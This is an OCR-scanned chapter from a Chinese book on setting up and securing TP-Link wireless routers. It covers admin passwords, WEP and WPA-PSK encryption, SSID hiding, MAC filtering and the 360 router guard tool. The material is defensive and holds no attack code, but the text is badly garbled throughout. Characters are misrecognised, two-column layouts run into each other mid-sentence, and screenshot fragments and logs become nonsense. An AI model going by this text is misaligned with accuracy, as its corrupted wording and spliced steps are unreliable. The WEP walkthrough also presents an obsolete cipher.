选择 “主机 列表 ”选项 ， 进 入 “主机 
列表 设置 ”界面 ， 在 其 中 可 以 设置 内 部 主 
dea a hid 


本 瑟 坝 置 内 部 主机 列 志 信息 


甘于 到 | 主机 名 


增加 单个 条 目 | | 帅 附 所 有 条 目 
[页 | [下 -页 | 当前 第 [TY 页 [天助 | 


选择 “访问 目标 ”选项 ， 进 入 “访问 
目标 设置 ”界面 ， 在 其 中 可 以 设置 访问 目 
标 信息 ， 如 下 图 所 示 。 
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访问 目标 设置 
本 页 及 置 访问 目标 信息 
| age | 


详细 信息 


Te 
r= 


选择 “日 程 计划 ”选项 ， 进 入 “日 程 
计划 设置 ”界面 ， 在 其 中 可 以 设置 上 网 控 
制 的 日 程 计划 ， 如 下 图 所 示 。 


本 外 供 置 上 网 控制 的 日 程 计划 


_ Dn | Hi | 有 | ia | 机 
当前 绚 直 为 宇 


当前 第 [1 了 ] 页 


选择 路 由 功能 列表 “路 由 功能 ”选项 
下 的 “静态 路 由 表 ” 选 项 ， 进 入 “静态 路 
由 表 ” 设 置 界 面 ， 在 其 中 可 以 设置 路 由 器 
的 静态 路 由 信息 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 的 静态 路 由 信息 。 
攻 司 目的 网 络 地 址 


添加 新 条 目 | [ 使 所 有 条 目 生效 | [使 所 有 条 已 失效 | [ 员 除 所 有 条 目 
[页 | [页 [请 勒 | 


13.1.7 MAC 绑 定 与 动态 DNS 


IP 与 MAC 绑 定 在 一 起 便于 网 络 管理 ， 
在 一 定 程 度 上 防止 ARP 病 毒 的 传播 ， 也 可 
在 一 定 程 度 上 限制 随意 算 改 IP 地 址 的 现象 。 
动态 DNS 是 指 没 有 固定 IP 的 主机 利用 动态 
DNS 服 务 ， 帮 助 主机 随 着 IP 的 改变 更 新 域名 
与 JP 的 关联 。 


IF 与 MAC 和 定 


ARF 职 射 表 


动态 DNS 


设置 MAC 绑 定 与 动态 DNS 的 操作 步骤 
如 下 : 
在 路 由 功能 列表 中 选择 “IP 与 MAC 
绑 定 ”选项 下 的 “静态 ARP 绑 定 设置 ” 选 
项 ， 在 打开 的 界面 中 可 以 设置 单机 的 MAC 
地 址 和 JP 地址 的 匹配 规则 ， 如 下 图 所 示 。 


藤 访 是 ?纯正 去 兰 


本 册 设 置 羊 机 的 IC 地 址 和 亚 地 址 的 匹配 起 刚 


AH 外 定 : 。 ” 包 不 启用 2 启用 


GT ur [it [ee es | 
| im | m1 | | 


选择 “ARP 映 射 表 ”选项 ， 在 打开 的 
界面 中 可 以 绑 定 IP 与 MAC 的 主机 ， 也 可 时 
入 或 删除 现 有 ARP 映 射 表 ， 如 下 图 所 示 。 


EE TT [rt [GT ws | 
er ti | 二 [| [了 


在 路 由 功能 列表 中 选择 “动态 DNS 设 
置 ” 选 项 ， 在 打开 的 界面 中 可 以 设置 Oray. 
com 花 生 汉 DDNS 的 参数 。 这 里 需要 先 注册 
一 个 花生 完 账 号 ， 如 下 图 所 示 。 


动态 DNS 设置 


本 页 设置 “Dray. cm 花生 壳 IDNS ”的 基数。 


服务 商 镑 接 : 花生 这 动态 志 i 言 动 态 志 


服务 提供 者 : 注册 
用 户 名 : | | 


密码: 


启用 DDNS: 

连接 状态 : 

服务 类 型 : 

域名 信息 : 无 

注意 : 您 成 功 登录 之 后 ， 需 要 先 退 出 才能 使 用 其 他 帐 号 登录 。 


13.1.8 ”路 由 器 系统 工具 的 设置 


路 由 右 的 系统 工具 主要 用 于 路 由 器 
的 控制 管理 ， 其 中 包括 时 间 设 置 、 诊 断 工 
具 、 软 件 升级 、 恢 复出 厂 、 备 份 还 原 、 路 
由 重 局 、 口 令 修改 等 功能 ， 如 下 图 所 示 。 


诊 断 工 县 
软件 升级 
恢复 出 厂 设 置 


和 份 和 载 入 配 瑟 


剖 启 路 由 器 


修改 登录 口令 
系统 日 志 


流量 统计 
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进入 路 由 器 系统 工具 设置 的 操作 步骤 
如 下 : 
在 路 由 功能 列表 中 选择 “系统 工具 ” 
选项 下 的 “时 间 设 置 ” 选 项 ， 在 打开 的 界 
面 中 可 以 设置 路 由 器 的 系统 时 间 ， 用 户 还 
可 以 选择 自己 设置 时 间或 者 从 互联 网 上 获 
取 标 准 的 GMT 时 间 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 的 系统 时 间 ， 您 可 以 选择 自己 设置 时 间或 者 从 互联 网 上 获取 标 
准 的 QM 时 间 。 


注意 : 关闭 路 由 器 电源 后 ， 时 间 信息 会 丢失 ， 当 您 下 次 开机 连 上 Internet 后 ， 
路 由 器 将 会 自动 获取 Gr 时 间 。 您 必须 先 连 上 Internet 获 取 GT 时 间或 到 此 页 设 
置 时 间 后 ， 其 他 功能 中 的 时 间 限定 才能 生效 。 

CGMT+ 08:00) 北京 ， 重 庆 ， 乌 曾 木 齐 ， 香 港 特别 行政 区 , 台北 * 
日 期: 年 [有 A[T |] 
时 间 : [9 | 时 分 [5 | 和 
优先 使 用 TP 服务 器 1: 
优先 使 用 PT? 服务 器 2: 
获取 GMT 间 | ( 仅 在 连 上 互联 网 后 才能 获取 GI 时 间 ) 


侈 注意 : 关闭 路 由 器 电源 后 ， 时 间 信 息 会 
丢失 ， 当 您 下 次 开机 连 上 Internet 后 ， 路 由 
器 将 会 自动 获取 GMT 时 间 。 您 必须 先 连 上 
Internet 获 取 GMT 时 间或 在 此 界面 设置 时 间 
后 ， 其 他 功能 中 的 时 间 限 定 才能 生效 。 


选择 “诊断 工具 ”选项 ， 在 打开 的 界 
面 中 可 以 使 用 Ping 或 者 tracert 诊 断路 由 器 的 
连接 状态 ， 如 下 图 所 示 。 


& Ping Tracert 


(ira 
(ro0-zo0n 于 和 ) 
Tracert 册 数 ; (1-30) 


选择 “软件 升级 ”选项 ， 在 打开 的 界 
面 中 可 以 通过 官方 发 布 的 软件 版 本 ， 对 现 
有 路 由 进行 软件 升级 ， 如 下 图 所 示 。 
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软件 升级 


通过 升级 本 路 由 器 的 软件 ， 您 将 获得 新 的 功能 。 


文件 名 : wr845nv2-cn-up.bin 
TFTF 服务 如 IF: |192.168.1.100 


当前 软件 版 本 : 
当前 硬件 版 本 : 


4,19.18 Build 130123 Rel.32879n 
WRB45H 2.0 00000000 


注意 : 请 使 用 有 线 LA 口 连接 进行 软件 升级 。 升级 时 请 选择 与 当前 硬件 版 本 
一 致 的 软件 。 升 级 过 程 不 能 关闭 路 由 器 电源 ， 否 则 将 导致 路 由 絮 损坏 而 无 法 


使 用 。 升 级 过 程 约 40 秒 ， 当 升级 结束 后 ， 路 由 器 将 会 自动 重新 启动 。 


(人 @ 注 意 : 请 使 用 有 线 LAN 口 连接 进行 软件 
升级 。 升 级 时 请 选择 与 当前 硬件 版 本 一 致 
的 软件 。 升 级 过 程 不 能 关闭 路 由 器 电源 ， 
否则 将 导致 路 由 器 损坏 而 无 法 使 用 。 升 级 
过 程 约 40s， 当 升级 结束 后 ， 路 由 器 将 会 自 
动 重新 启动 。 

step 加 选择 “恢复 出 厂 设置 ”选项 ， 在 打开 
rp a 
以 将 路 由 器 的 所 有 设置 恢复 到 出 厂 时 的 默 
认 状 态 ， 如 下 图 所 示 。 


恢复 出 厂 设 置 
单 击 此 按 毛 将 使 路 由 如 的 所 有 设置 恢复 到 出 厂 时 的 默认 状态 。 


恢复 出 厂 设置 


选择 “备份 和 载 入 配置 文件 ”选项 
ry yp 
置 。 建 议 在 修改 配置 及 升级 软件 前 备份 当前 
的 配置 文件 ， 当 然 也 可 以 通过 选择 备份 的 配 
置 文件 恢复 之 前 的 配置 ， 如 下 图 所 示 。 


腹 份 和 载 入 配置 文件 


您 可 以 在 这 保存 您 的 设置 。 我 们 建议 您 在 修改 配置 及 升级 软件 前 备份 您 的 本 
置 文件 。 


备份 配置 文件 
您 可 以 通过 载 入 配置 文件 来 恢复 您 的 设置 。 


路 径 : [| 选择 文件 | 未 选择 任何 文件 | [ 坦 入 配置 文件 


注意 ; 。” 1， 号 入 配置 文件 后 ,设备 中 原 有 的 用 户 配置 将 会 去 失 。 如 果 您 载 
入 的 枉 填 文件 有 误 ， 可 能 会 导致 设备 无 法 被 管理 。 
2， 载 入 配置 文件 的 过 程 不 能 关闭 路 由 器 电源 ， 天 则 将 导致 路 由 器 
损坏 而 无 法 使 用 。 载 入 过 程 约 20 秒 ， 当 载 入 结束 后 ， 路 由 器 将 会 自 
动 重新 启动 。 


选择 “重启 路 由 ”选项 ， 在 打开 的 界 
面 中 单 击 “重启 路 由 器 ”按钮 ， 可 以 重新 
启动 路 由 器 ， 如 下 图 所 示 。 
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单 击 此 按钮 将 使 路 由 器 重新 启动 。 


选择 “修改 登录 口令 ”选项 ， 在 打开 
的 界面 中 可 以 修改 系统 管理 员 的 用 户 名 与 
口令 ， 建 议 配 置 完 路 由 器 后 重新 设置 管理 
员 的 账号 密码 ， 防 止 黑客 使 用 弱 口 令 登 录 
路 由 ， 如 下 图 所 示 。 


本 页 修改 系统 管理 员 的 用 户 名 及 口令 ， 用户 名 及 口令 长 度 不 能 超过 14 个 字 
Ti® 

原 用 户 名 : 

原 口 令 ; 

新 用 户 名 : 

新 口令 : 

确认 新 口令 : 


选择 “系统 日 志 ” 选 项， 在 打开 的 
员 登 录 信 息 、 路 由 健康 状态 等 。 如 果 路 由 
器 被 非法 修改 ， 可 以 通过 日 es 
除 ， 如 下 图 所 示 。 


索引 月 志和 内容 


| 1 | TDED z006-01-0L 06:00:00| 和 2 语 iD 
ED EET 
[3| INFD 2006-01-0! 08:00:51 |DHCPS: 1:0x0067362£dD4b, BAK in reguest. 
IHFD 2006-01-0! 08:00:51 |IHCPS: 1:0d087362fdD4b，192. 168.1. 10D，ACE in request. 

:|2013-06-05 19:03:37 T2843s | 人 sssrtion falilad: 0, file .. /lmao/ath dov/ath timar.o, 11 
:(|2013-06-20 4:18:43 13970s| 

b Load Fxception 
Exoeption Progran Counter: OxBO1di4cc 
tatus Hegistar ”DonnfaDl 
ause 了 Reslster: 0x0DD00008 

oxr Addrosrs DOD000014 
ask: 0x6offa4dan “tHostapd” 
六 |20L3-11-16 0:10:13 275422=| 

b Load Excaption 
Exception Progran Counter: DxB01didcc 
Etatus Hagicter: CeOODO0td401 
ause Eezister. 0xDDD00005 
hooess Kddress : DodD000014 


:{|2014-02-20 19:06:35 12224s| 
b Load Exoapti or 
Excent]} on Ee Counter’: OxBO0]dfdec 
: CosDI00 £401 


star: 0DxDOD00005 
Access Address DOD0000ld 
ask: DxaDffBac) “tHostapd” 


Tins = 20068-01-01 8:09:02 bdis 

-Yer = NRO45N 2.0 0000D000 : S-VYer = 4.19. 16 Puild 130123 Rel. S2379n 

L= 192.168.1.1 : N= 25. 266.255.0 

| 1 ee 1 

Pree=E02B, Busy=?, Birnd-0, Irv=0/10, Hed 0D, Dns=248, ol=1536, fo0/0, :go00 


[ 列 新 |] [ 尘 亲 有 忆 志 | 
选择 “流量 统计 ” 在 打开 的 界 
面 中 可 以 分 别 对 路 由 器 总 的 数据 流量 以 及 
最 近 10s 内 的 数据 流量 进行 统计 。 默 认 情 况 
是 关闭 的 ， 如 有 需要 可 以 打开 。 在 网 络 遭 
受 攻 击 时 ， 通 过 数据 流量 的 分 析 对 找 出 攻 


击 主机 也 是 非常 有 帮助 的 ， 如 下 图 所 示 。 


本 页 分 别 对 路 由 说 总 的 数据 沉重 以 及 红 近 10 秒 串 内 的 款 据 流 旦 进行 了 统计 。 
当前 流量 统计 状 志 : 已 关闭 
数据 电 绩 计时 间 i 闻 人 遇 : 15~60] 种 
按 IF 地 th 排序 "| 白 动 刷新 | 刷新 | 
| EE 
| ml | Mam [Sr | Wm | sy orm] wl mm | 
当前 统计 数据 为 空 


每 页 最 示 [5 "| 行 当前 第 "页 


无 线路 由 禹 的 安全 策略 


无 线路 由 器 本 映 目 带 有 安全 设置 选 
项 ， 通 过 设置 这 些 安全 选项 ， 可 以 提高 
无 线路 由 器 的 安全 性 能 ， 从 而 不 受 黑 客 
攻击 。 


13.2.1 设置 复杂 的 管理 员 密 码 


路 由 器 的 初始 密码 比较 简单 ， 为 了 保 
证 局 域 网 的 安全 ， 一 般 需 要 修改 或 设置 管 
理 员 密码 ， 有 具体 的 操作 步骤 如 下 。 
[sep 国 打开 路 由 器 的 Web 后 台 设 置 界 面 ， 
选择 “系统 工具 ”选项 下 的 “修改 登录 窗 
码 ” 选 项 ， 打 开 “ 修 改 管 理 员 密码 ”工作 
界面 ， 如 下 图 所 示 。 


加 TL-WR885N x EE 


一 口 
Ee 本 | 192.168.0.1 六 | 三 … 


13.2 


TP-LINIKC 


[step 轩 在 “ 原 密码 ”文本 框 中 输入 原来 的 
密码 ， 在 “新 密码 ” 和 “确认 新 密码 ” 文 
本 框 中 输入 新 设置 的 密码 ， 最 后 单 击 “ 保 
存 ” 按 钮 即 可 ， 如 下 图 所 示 。 
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四 TL-WR885N xX EE 


一 口 
下 强直 | 19216801 家 | 三 谤 总 


TP-LINIC 


13.2.2 无 线 网 络 WEP 加 密 

WEP 采 用 对 称 加 密 机 理 ， 数 据 的 加 密 
和 解密 采用 相同 的 密 钥 和 加 密 算 法 。 下 面 
详细 介绍 无 线 网 络 WEP 加 密 的 具体 方法 。 


1. 设置 无 线路 由 嘎 WEP 加 密 数 据 


打开 路 由 器 的 Web 后 台 设 置 界 面 ， 单 击 
左 侧 “无 线 参 数 ” 一 “基本 设置 ”选项 ， 
选中 “开启 安全 设置 ” 复 选 框 ， 在 “安全 
类 型 ”下 拉 菜 单 中 选择 WEP 选 项 ， 在 “ 密 
钥 格 式 选 择 ” 下 拉 菜 单 中 选择 “ASCII 
码 ” 选 项 。 设 置 密 钥 ， 在 “ 密 钥 1” 后 面 
的 “ 密 钥 类 型 ”下 拉 列 表 中 选择 “64 位 ” 
选项 ， 在 “ 密 钥 内 容 ” 文 本 框 中 输入 要 使 
用 的 密码 ， 本 实例 输入 密码 为 cisco， 单 击 
“保存 ”按钮 ， 如 下 图 所 示 。 


安全 提示 :为 保障 网 络 安全 ， 强 列 推 荐 开启 安全 设置 ， 并 使 用 
WPA-PSK/WPA2-PSK AES 加 密 方 法 。 


| 开启 安全 设置 

安全 类 型 : WEP 四 

安全 选项 : 自 z “ 

密 钥 格式 选择 : [scII 码 -| 

选择 64 位 密 钥 需 输 入 16 进 市 数字 符 10 个 ， 或 者 ASCII 
码 字 符 5 个 。 选 择 128 位 密 詹 圳 输入 16 进 制 数 字符 26 
个 ， 或 者 KASCII 码 字符 13 个 。 选 择 152 位 密 钥 霖 输入 18 
进 制 数字 符 32 个 ， 或 者 ASCII 码 字符 16 个 。 


密码 长 度 赔 明 : 
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2. 客户 端 连 接 接 情 况 。 下 图 所 示 表 明 已 经 成 功 连接 无 线 
需要 WEP 加 密 认证 的 无 线 客户 端 连接 ”一 

的 具体 操作 步骤 。 wn 

[step 回 单 去 系统 桌面 右 下 角 罗 图标 ， 无 线 的 ni 


客户 端 自动 扫描 到 附近 区 域内 的 所 有 无 线 请 天 memctitn 
信号 ， 如 下 图 所 示 。 eae 


当前 连接 到 : 


Es 未 识别 的 网 络 
无 Internet 访问 


tp-link 


tzgs 


无 续 网 络 连 接 


tp-link 


打开 网 络 和 共享 中 心 


13.2.3 WPA-PSK 安 全 加 密 算法 


WPA-PSK 可 以 看 成 是 一 个 认证 机 制 |， 
和 只 要 求 一 个 单一 的 密码 进入 每 个 无 线 局 域 
3 口 DA 
5 去 吕 ik 克 项 ， 在 到 的 快 菜 间 网 点 《如 无线 了 由 各》， 只 要 省 码 正确 
中 选择 “连接 ”选项 ， 如 下 图 所 示 。 dtl Li 
WPA-PSK 或 者 WPA2-PSK 加 密 无 线 网 络 。 


当前 连接 到 : 


局 spaena 1. 设置 无 线路 由 器 WPA-PSK 安 全 加 密 
,一 一 [sp 国 打开 路 由 器 的 Web 后 台 设 置 界 面 ， 先 

择 左 侧 “ 无 线 参 数 ” _，“ 基 本 设置 ”选项 ， 
une - 选中 “开启 安全 设置 ” 复 选 框 ， 在 “安全 


] 类 型 ”下 拉 列 表 中 选择 “WPA-PSK/WAP?2- 
PSK” 选 项 ， 在 “安全 选项 ”和 “加 密 方 
' 法 ”下 拉 菜 单 中 均 选择 “自动 选择 ”选项 ， 
| 在 “PSK 密 码 ” 文 本 框 中 输入 加 密 密 码 ， 本 
弹出 “连接 到 网 络 ” 对 话 框 ， 在 “ 安 。 实例 设置 密码 为 sushi1986， 如 下 图 所 示 。 
全 密 钥 ”文本 框 中 输入 密码 cisco， 单 击 a 
“确定 ” 按钮 ， 如 下 图 所 示 。 克 外 许 ssIn 广 播 
司 连接 到 网 络 | | 三 开启 Bridse 功 能 


安全 提示 :为 保障 网 络 安 全 ， 强 列 推 荐 开启 去 全 设置 ， 并 使 用 
WPA-PSK/WPA2-PSK AES 加 密 方 法 。 


| 开启 安全 设置 


安全 类 型 : [WPA-PSK/WPA2-PSK 7| 

安全 选项 : [自动 选择 司 

加 密 方法 : [自动 选择 =| 

FSK 密码 : 最 短 为 8 个 字符 ， 最 长 为 63 个 字符 


sushi1986 


组 密 钥 更 新 周期 : 人 单位 为 种, 最 小 值 为 30, 不 更 新 则 为 0) 


[seep 贺 单 击 系统 桌面 右 下 角 贺 图标 ， 将 筷 标 大 二! 大 机 
放 在 tp-link 选 项 上 ， 可 以 看 到 无 线 信 号 的 连 [Sep 图 单 二 “保存 ”按钮 ， 在 弹出 的 提示 对 
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话 框 中 单 击 “ 确 定 ” 按 钮 ， 重新 启动 路 由 
器 即 可 ， 如 下 图 所 示 。 


192.168.1.1 上 的 网 页 显示 : 


奉 认 重新 富 动 双 白 刁 ? 


确定 取 湛 


2. 使 用 WPA-PSK 安 全 加 密 认 证 的 无 线 
客户 端 。 


[step 国 单 去 系统 桌面 右 下 角 辆 图标， 无 线 客 
户 端 会 自动 打 描 区 域内 的 无 线 信 号 ， 如 下 
图 所 示 。 


当前 连接 到: 
三 未 识别 的 网 络 
无 Internet 访问 


无 绪 网 络 连 接 


tp-link 


右 击 tp-link 选 项 ， 在 弹出 的 快捷 菜单 中 
选择 “连接 ”菜单 命令 ， 如 下 图 所 示 。 


当前 连接 到 : 


计 未 识别 的 网 给 
2 无 Internet 访问 


无 绪 网 络 连 接 


tp-link 连接 | . 明 


TP-UNK_SW 


打开 网 络 和 共享 中 心 


弹出 “连接 到 网 络 ” 对 话 框 ， 在 “人 安 
全 密 钥 ”文本 框 中 输入 密码 sushi1986， 单 去 
“确定 ”按钮 ， 如 下 图 所 示 。 
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键入 网 络 安全 密 钥 


安全 密 铜 (S): sushi1986 


隐藏 字符 (H) 


[sep 加 单 击 系统 桌面 右 下 角 贺 图 标 ， 将 鼠标 
放 在 tp-link 信 号 上 ， 可 以 看 到 无 线 信号 的 连 
接 情 况 。 下 图 所 示 表 明 已 经 成 功 连接 无 线 
路 由 器 。 


当前 连接 到 : 


有、 tp-link 
Internet 访问 


一 未 识 列 的 网 络 
无 Internet 访问 


无 线 网 络 连 按 


tp-link 


无 线 电 类型 : 802.11g | ， 
SSID: tp-link 


TP-LINK SW 


全 提示 : 在 WPA-PSK 加 密 算 法 的 使 用 过 程 
中 ， 密 码 设 置 应 该 尽 可 能 复杂 ， 并 且 要 注 
意 定 期 更 改 千 码 。 


13.2.4 ” 蔡 用 SSID 广 播 


SSID 就 是 一 个 无 线 网 络 的 名 称 ， 无 线 
客户 端 通过 无 线 网 络 的 SSID 来 区 分 不 同 的 
无 线 网 路 。 为 了 安全 起 见 ， 往 往 要 求 无 线 
AP 禁止 广播 该 SSID， 只 有 知道 该 无 线 网 络 
SSID 的 人 员 才 可 以 进行 无 线 网 络 连接 ， 禁 
用 SSID 广 播 的 具体 操作 步骤 如 下 。 


1. 设置 无 线路 由 器 禁用 SSID 广 播 


无 线路 由 器 禁用 SSID 广 播 的 具体 操作 
步骤 如 下 。 
打开 路 由 器 的 Web 后 台 设 置 界 面 ， 设 
置 无 线 网 络 的 SSID 人 信息， 取消 选中 “允许 
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SSID 广 播 ?” 复 选 框 ， 单 击 “ 保 存 ” 按 钮 ， 右 击 “其 他 网 络 ” 选 项 ， 在 弹出 的 快 


如 下 图 所 示 。 捷 菜 单 中 选择 “连接 ”选项 ， 如 下 图 所 示 。 
me 

本 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 和 去 全 认证 选项 。 未 识别 的 网 络 

Dm as 

频 段 : [自动 选择 悦 无 线 网 络 连 接 

模式 : [Sambps (802.11e) =| 


区 开启 无 线 功能 
三 允许 SsID 广 播 


| 厂 开启 Bridze 功 能 
安全 提示 :为 保障 网络 安全 ， 强 烈 推荐 开户 安全 设置 ， 并 使 用 
WPA-PSK/WPA2-PSK 生 S 可 安 方 法 。 


区 开启 安全 设置 

安全 类 型 : [WPA-PSK/WPA2-PSK 本 

安全 选项 : [自动 选择 可 

[Sep 加 弹出 一 个 提示 对 话 框 ， 单 击 “ 确 定 ” 
按钮 ， 重 新 尼 动 路 由 器 ， 如 下 图 所 示 。 


192.168.1.1 上 的 网 页 显示 : st 于 出 区 人 
称 ” 文 本 框 中 输入 要 连接 网 络 的 SSID 号 ， 
RS 本 实例 输入 ssh， 单 击 “ 确 定 ” 按 钮 ， 如 下 


a 图 所 示 。 


有 


> 安 户 端 连 接 键入 网 络 的 名 称 (SSID) 

禁用 SSID 广 播 的 无 线 客户 端 连接 的 具 
体操 作 步 又 如 下 。 
[step 图 单 击 系统 桌面 右 下 角 贺 图标 ， 会 看 到 
无 线 客户 端 自动 扫描 到 区 域内 的 所 有 无 线 
信号 ， 会 发 现 其 中 没有 SSID 为 ssh 的 无 线 网 
络 ， 但 是 会 出 现 一 个 名 称 为 “其 他 网 络 ” ，[S 国 在 “安全 密 钥 ”文本 框 中 输入 无 线 网 
的 选项 ， 如 下 图 所 示 。 络 的 密 钥 ， 本 实例 输入 密 钥 sushi1986， 单 

击 “ 确 定 ” 按 钮 ， 如 下 图 所 示 。 
ET 


名 称 (A): ssh 


当前 连接 到 : 


二 未 识别 的 网 结 
无 Internet 访问 


键入 网 络 安全 密 钥 
| 无 线 网 络 连接 


tzgs 安全 密 钥 (5): sushi1986 


[| 隐藏 字符 (H) 
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SW-IT 


TP-LINK_SW 


其 他 网 络 


step 图 单 击 系统 桌面 右 下 角 团 图 标 ， 将 息 
标 放 在 ssh 选 项 上 可 以 看 到 无 线 网 络 的 连接 
情况 。 下 图 所 示 表 明 无 线 客户 端 已 经 成 功 
连接 到 无 线路 由 器 ， 如 下 图 所 示 。 
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信号 强度 ; 非常 好 

安全 类 型 : WPA2-PSK 

无 线 电 类 型 : 802.11g 
CMC9d ssiD: ssh 


打开 网 络 和 共享 中 心 


13.2.5 ”媒体 访问 控制 (MAC) 地 址 过 滤 


网 络 管理 的 主要 任务 之 一 就 是 控制 客 
户 端 对 网 络 的 接 入 和 对 客户 端的 上 网 行为 
进行 控制 ， 无 线 网 络 也 不 例外 ， 通 第 无 线 
AP 利用 媒体 访问 控制 (MAC) 地 址 过 滤 的 
方法 来 限制 无 线 客 户 端 的 接 入 。 

使 用 无 线路 由 器 进行 MAC 地 址 过 滤 的 
具体 操作 步骤 如 下 。 
stp 图 打开 路 由 器 的 Web 后 台 设置 界面 ， 单 
击 左 侧 “无 线 和 参数 ”一 “无 线 网 络 MAC 地 
址 过 滤 设 置 ” 选 项 ， 默 认 情 况 MAC 地 址 过 
滤 功 能 是 关闭 状态 ， 单 击 “ 启 用 过 滤 ” 按 
钮 ， 开 局 MAC 地 址 过 滤 功 能 ， 单 击 “ 添 加 
新 条 目 ” 按 钮 ， 如 下 图 所 示 。 

无 线 网 络 WAC 地 址 过 滤 设 置 
本 页 设置 MAC 地 址 过 滤 来 控制 计算 机 对 本 无 线 网 络 的 访问 。 


HAC 地 址 过 滤 功 能 : 
过 滤 规 则 
他 允许 列表 中 生效 规则 之 外 的 WAC 地 址 访问 本 无 线 网 络 


已 关闭 


全 禁止 列表 中 生效 规则 之 外 的 MAC 地 址 访问 本 无 线 网 络 


MAC 地 址 


| 状态 /类 型 
所 有 条 目 皇 区 


卫 有 条 目 失 效 


打开 “无 线 网 络 MAC 地 址 过 滤 设 
置 ” 对 话 框 ， 在 “MAC 地 址 ”文本 框 中 
输入 无 线 客户 端的 MAC 地 址 ， 本 实例 输 
入 MAC 地 址 为 00-0c-29-5A-3C-97， 在 “ 描 
述 ” 文 本 框 中 输入 MAC 描 述 信息 sushipc， 

在 “类 型 ”下 拉 列 表 中 选择 “允许 ” 选 
项 ， 在 “状态 ”下 拉 列 表 中 选择 “生效 ” 
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选项 ， 依 照 此 步骤 将 所 有 合法 的 无 线 客户 
端的 MAC 地 址 加 入 此 MAC 地 址 表 后 ， 单 去 
“保存 ”按钮 ， 如 下 图 所 示 。 
无 绪 了 网 络 避 5 地址 过 滤 设 置 
本 页 设置 aC 地 址 过 滤 来 控制 计算 机 对 本 无 线 网 络 的 访问 。 


Mac 地 址 : 


00-0C-29-5A-3C-97 


选择 “过 滤 规 则 ”选项 下 的 “禁止 ” 
单 选 框 ， 表 明 在 下 面 MAC 列 表 中 生效 规则 
之 外 的 MAC 地 址 不 可 以 访问 无 线 网 络 ， 如 
下 图 所 示 。 

某 些 程 友 需 要 交 条 猴 接 ， 如 Iaternaet 六 台 ， 视 虹 会 议 ， 网络 电话 等 。 由 于 防火 增 的 让 在 ， 文 


些 程序 无 法 在 漳 单 的 NAT 路 由 下 工作 。 特 吻 应 用 程序 使 得 其 些 这 样 的 应 用 程序 能 和 在 NAr 路 
由 下 工作 。 


[wn | 锅 上 江口 | _ 触 六 协议 
添加 新 条 目 | | 使 所 有 条 目 生效 | | 使 所 有 东 目 失效 


这 样 无 线 客 户 端 在 访问 无 线 AP 时 ， 
会 发 现 除 了 MAC 地 址 表 中 的 MAC 地 址 之 
外 ， 其 他 的 MAC 地 址 无 法 再 访问 无 线 AP， 
也 就 无 法 访问 互联 网 。 


13.3 无 线路 由 安全 管理 工具 


使 用 无 线路 由 管理 工具 可 以 方便 管理 


无 线 网 络 中 的 上 网 设备 ， 本 节 就 来 介绍 两 
个 无 线路 由 安全 管理 工具 ， 包 括 360 路 由 器 
卫士 与 路 由 优化 大 师 。 


13.3.1 360 路 由 器 卫士 


360 路 由 器 卫士 是 一 款 由 360 官 方 推 
出 的 绿色 免费 的 家 庭 必 备 无 线 网 络 管理 工 
具 。360 路 由 器 卫士 软件 功能 强大 ， 支 持 几 
平 所 有 的 路 由 器 。 在 管理 的 过 程 中 ， 一旦 
发 现 蹦 网 设备 想 踢 就 踢 。 下 面 介 绍 使 用 360 
路 由 器 卫士 管理 网 络 的 操作 方法 。 
[step 园 下 载 并 安装 360 路 由 器 卫士 ， 双 击 桌 
面 上 的 快捷 图 标 ， 打 开 “ 路 由 器 卫士 ” 工 
作 界 面 ， 提 示 用 户 正 在 连接 路 由 ， 如 下 图 
所 示 。 


pa | 
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[step 园 连接 成 功 后 ， 弹 出 “路 由 器 卫士 提醒 您 ”对 话 框 ， 在 其 中 输入 路 由 账号 与 密码 ， 如 
下 图 所 示 。 


请 输入 您 的 路 由 器 帐号 和 窗 码 
路 由 帐号 ;wimn 
路 由 密码 : wwero 


[step 图 单 去 “下 一 步 ” 按 钮 ， 进 入 “我 的 路 由 ”工作 界面 ， 在 其 中 可 以 看 到 当前 的 在 线 设 
备 ， 如 下 图 所 示 。 


王 名 单 [0) TP-Link 


L-WR38SN 


DESKTOP-67NQ... 2 
IP:192.168.0.105 


未 知 设备 皮 
IP:192,168.0,103 


未 知 设备 久 
IP:192.168.0.107 


AFOIG-611211... 乡 有 过 


IP:192.168.0.112 


[Step 加 如 果 想 要 对 某 个 设备 限 速 ， 则 可 以 单 击 设备 后 的 “ 限 速 ”按钮 ， 打 开 “ 限 速 ” 对 话 
框 ， 在 其 中 设置 设备 的 上 传 速度 与 下 载 速 度 ， 设 置 完成 后 单 击 “ 确 认 ” 按 钮 即 可 保存 设置 ， 
如 下 图 所 示 。 


限 速 


上 传 速度 限制 -。 |5 | Lasv 


下 载 芝 度 限 填 |: gq | Ka/s 和 


0 表示 不 限 速 , 最 高 限 速 10M 
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[step 图 在 管理 的 过 程 中 ， 一 旦 发 现 有 中 网 设备 ， 可 以 单 击 该 设备 后 的 “禁止 上 网 ”按钮 ， 
如 下 图 所 示 。 


黑客 症 (D) TP-Link 
TL-WR886N 


AFolG%2D6112. 2 ”a 23KB/S 
IP:192.168.0.112 275KB/s 


AFOIG%2D7021.. 2 ” OKB/S 


IP:192.168.0.114 % OKBI/s 


%E7%BD%91%E7..2f OKB/S 
IP:192.168.0.108 116KB/s 


HUAWEI%SFMAI.. 2” UKB/S 


|P:194 Ipigit: 192.158.0.103 “KB/s 
MAC 地 址 : 84-BE-52-38-17-01 


[sep 贺 禁止 上 网 完成 后 ， 单 击 “ 黑 名 单 ” 选 项 卡 ， 进 入 “ 黑 名 单 ” 设 置 界面 ， 在 其 中 可 以 
看 到 被 禁止 的 上 网 设备 ， 如 下 图 所 示 。 


路 由 器 卫士 : 我 的 路 由 路 由 防 黑 ”路 由 跑 分 。 。 扩展 工具 


在 线 设 备 (5) 里 名 单 (1) TP-Link 


TL-WRBB36N 


| HUAWEI%SFMAI... 之 


A 
前 网 速 


选择 “路 由 防 黑 ”选项 卡 ， 进 入 “路 由 防 黑 ”设置 界面 ， 在 其 中 可 以 对 路 由 器 进行 
防 黑 检测 ， 如 下 图 所 示 。 


路 由 器 卫士 ” 我 的 路 由 由 跑 分 。 ”扩展 工具 路 由 设置 


路 由 器 还 未 做 过 防 黑 检测 


多 路 由 强 DHCP 服 务 的 DNS 设 竺 行 检测 
全 DMZ 主 机 的 设 癌 行 检 测 | 
人 @ 路 由 器 “有 尼 运 饼 于 ” 远 持 项 润 情况 待 榨 测 | 
